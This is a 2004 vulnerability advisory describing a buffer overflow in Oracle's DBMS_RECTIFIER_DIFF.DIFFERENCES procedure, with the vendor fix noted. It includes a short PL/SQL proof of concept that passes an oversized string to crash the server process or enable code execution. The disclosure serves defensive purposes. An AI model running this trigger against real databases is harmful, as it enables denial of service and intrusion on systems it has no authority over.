|
#36 - Buffer overflow in procedure DIFFERENCES of DBMS_RECTIFIER_DIFF package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When DIFFERENCES procedure is called with a long string in the one of the parameters a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
SYS.DBMS_RECTIFIER_DIFF.DIFFERENCES (SNAME1 => 'Y', ONAME1 => 'Y', REFERENCE_SITE => 'Y', SNAME2 => 'Y', ONAME2 => 'Y', COMPARISON_SITE =>
'Y', WHERE_CLAUSE => 'Y', COLUMN_LIST => 'Y', MISSING_ROWS_SNAME => 'Y', MISSING_ROWS_ONAME1 => AAA, MISSING_ROWS_ONAME2 => 'Y',
MISSING_ROWS_SITE => 'Y', MAX_MISSING => 1, COMMIT_ROWS => 1);
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or SYSDBA role and users granted execute permissions on DBMS_RECTIFIER_DIFF package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
